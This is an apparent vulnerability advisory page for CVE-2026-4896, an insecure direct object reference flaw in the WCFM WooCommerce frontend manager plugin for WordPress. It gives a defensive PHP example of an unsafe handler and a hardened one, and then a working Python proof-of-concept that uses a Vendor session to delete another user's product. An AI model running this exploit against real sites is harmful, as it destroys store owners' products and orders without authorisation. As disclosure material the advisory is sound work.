Security Vulnerability Report
CVE-2026-4896 CVSS 8.1 HIGH

CVE-2026-4896

Published: 2026-04-04 08:16:07
Last Modified: 2026-04-24 18:13:29

Description

The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via multiple AJAX actions including `wcfm_modify_order_status`, `delete_wcfm_article`, `delete_wcfm_product`, and the article management controller due to missing validation on user-supplied object IDs. This makes it possible for authenticated attackers, with Vendor-level access and above, to modify the status of any order, delete or modify any post/product/page, regardless of ownership.
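The missing ownership check described above, shown as an added illustrative WordPress AJAX handler that is not WCFM's code: the unsafe form beside a hardened one. The function names, the `nonce` request parameter and the `delete_others_products` capability (WooCommerce's "others" product capability) are assumptions for this example.

```php
<?php
// Illustrative handler for an AJAX "delete product" action; not WCFM's code.
// Function names, the nonce parameter and the capability name are assumed.

// BEFORE: the handler trusts the caller-supplied product_id and relies only on
// the caller being logged in, so any Vendor can delete any product (CWE-639).
function example_delete_product_unsafe() {
    $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;
    wp_delete_post( $product_id, true );
    wp_send_json_success( array( 'deleted' => $product_id ) );
}

// AFTER: verify the request nonce, resolve the object, confirm its type, and
// confirm the caller owns it (or holds an explicit "others" capability) before
// acting on it. wp_send_json_error() terminates the request, so no return is needed.
function example_delete_product_safe() {
    check_ajax_referer( 'example_delete_product', 'nonce' );

    $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;
    $post       = $product_id ? get_post( $product_id ) : null;

    // Reject IDs that do not resolve to a product at all.
    if ( ! $post || 'product' !== $post->post_type ) {
        wp_send_json_error( array( 'message' => 'Invalid product.' ), 404 );
    }

    // Authorisation: the object must belong to the caller, unless the caller
    // has been granted a capability that explicitly covers other users' products.
    $is_owner = (int) $post->post_author === get_current_user_id();
    if ( ! $is_owner && ! current_user_can( 'delete_others_products' ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
    }

    wp_delete_post( $product_id, true );
    wp_send_json_success( array( 'deleted' => $product_id ) );
}

// Only the hardened handler is registered; logged-out callers never reach it
// because no wp_ajax_nopriv_ hook is added.
add_action( 'wp_ajax_example_delete_product', 'example_delete_product_safe' );
```

The same pattern (resolve the object, check its type, then check ownership against the current user) applies to the order-status and article handlers named in the description, where the object is an order or a post rather than a product.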

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WCFM – Frontend Manager for WooCommerce <= 6.7.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target configuration
target_url = "https://target-site.com/wp-admin/admin-ajax.php"

# Attacker's session cookie (must be Vendor role or higher)
attacker_cookies = {
    "wordpress_logged_in_xxxxx": "attacker_session_cookie_value"
}

# Exploit: delete a product that belongs to another user using IDOR
# Change product_id to the target victim's product ID
payload_data = {
    "action": "wcfm_ajax_controller",
    "wcfm_ajax_action": "delete_wcfm_product",
    "product_id": "999",  # Target product ID to delete
}

try:
    response = requests.post(target_url, data=payload_data, cookies=attacker_cookies)
    if response.status_code == 200:
        print("[+] Exploit request sent successfully.")
        print("[+] Response:", response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[-] Error occurred:", str(e))

References

https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-ajax.php?marks=644,880#L644
https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-article.php?marks=271#L271
https://www.wordfence.com/threat-intel/vulnerabilities/id/f8248098-dff2-4bac-a138-aa40c7ab7a1c?source=cve

Weakness

CWE-639 (Authorization Bypass Through User-Controlled Key)

Record Details

Record Status: Deferred
Exploitability Score: 2.8
Impact Score: 5.2